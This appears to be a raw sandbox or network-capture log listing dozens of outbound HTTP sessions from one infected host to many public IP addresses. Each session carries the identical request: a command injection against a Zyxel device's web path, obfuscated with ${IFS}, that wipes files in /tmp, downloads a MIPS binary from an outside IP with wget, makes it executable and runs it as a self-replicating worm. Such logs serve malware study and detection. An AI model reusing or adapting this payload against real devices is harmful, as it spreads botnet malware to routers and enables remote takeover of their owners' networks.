                                              Jan 29, 2024 07:03:47.973176003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3911192.168.2.144836680.231.157.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973203897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3912192.168.2.1434750170.89.171.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973243952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3913192.168.2.143421467.38.77.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973282099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3914192.168.2.145445682.25.220.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973313093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3915192.168.2.1432902151.116.129.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973335981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3916192.168.2.146061858.99.158.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973370075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3917192.168.2.1444818186.186.114.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973403931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3918192.168.2.1451872157.163.244.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973478079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3919192.168.2.1447698162.207.114.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973507881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3920192.168.2.144009075.147.247.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973539114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3921192.168.2.145981634.145.217.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973592997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3922192.168.2.1434022150.119.29.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973635912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3923192.168.2.1434272156.24.108.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973689079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3924192.168.2.144542686.40.58.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973728895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3925192.168.2.1433190129.33.80.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973757029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3926192.168.2.1446050153.133.126.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973792076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3927192.168.2.145079652.254.255.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973826885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3928192.168.2.1456668201.38.142.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973860979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3929192.168.2.144658293.89.49.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973897934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3930192.168.2.1457768175.96.74.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973931074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3931192.168.2.1457730111.43.149.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973959923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3932192.168.2.1458760194.59.98.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.973989964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3933192.168.2.1460616176.215.155.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974031925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3934192.168.2.143744861.7.131.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974062920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3935192.168.2.1451228139.55.222.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974108934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3936192.168.2.1432832105.252.120.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974143028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3937192.168.2.1436152198.45.15.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974160910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3938192.168.2.143441218.237.46.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974176884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3939192.168.2.1444556156.253.210.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974222898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3940192.168.2.1455408119.143.81.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974257946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3941192.168.2.145172057.245.217.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974298000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3942192.168.2.1454140131.169.217.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974328995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3943192.168.2.1436876221.135.141.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974359035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3944192.168.2.1434674213.151.201.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974411011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3945192.168.2.144066059.191.134.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974442005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3946192.168.2.145744895.55.50.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974472046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3947192.168.2.1451788101.13.171.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974494934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3948192.168.2.1435660102.35.122.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974558115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3949192.168.2.1440040134.12.44.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974584103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3950192.168.2.144469449.109.83.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974658012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3951192.168.2.143751689.119.105.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974695921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3952192.168.2.144149294.134.5.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974728107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3953192.168.2.1445038156.3.201.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974757910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3954192.168.2.1434012118.196.4.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974821091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3955192.168.2.144644097.99.190.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974855900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3956192.168.2.1449278143.242.125.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974932909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3957192.168.2.143985486.4.224.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974958897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3958192.168.2.1435416166.24.149.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.974998951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3959192.168.2.1445362185.144.218.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975040913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3960192.168.2.1436048159.150.39.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975073099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3961192.168.2.143894449.215.253.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975102901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3962192.168.2.144934669.17.119.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975147009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3963192.168.2.144140693.226.74.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975179911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3964192.168.2.1436248197.238.5.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975209951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3965192.168.2.145534259.187.54.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975249052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3966192.168.2.1435164153.129.150.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975289106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3967192.168.2.1453246112.74.33.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975302935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3968192.168.2.1448966106.220.19.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975348949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3969192.168.2.144779841.159.129.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975385904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3970192.168.2.145415831.40.113.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975414038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3971192.168.2.1460336205.155.243.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975466967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3972192.168.2.146079497.241.80.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975507975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3973192.168.2.145095279.236.130.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975538015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3974192.168.2.143360465.232.38.61443
                                              TimestampBytes transferredDirectionData
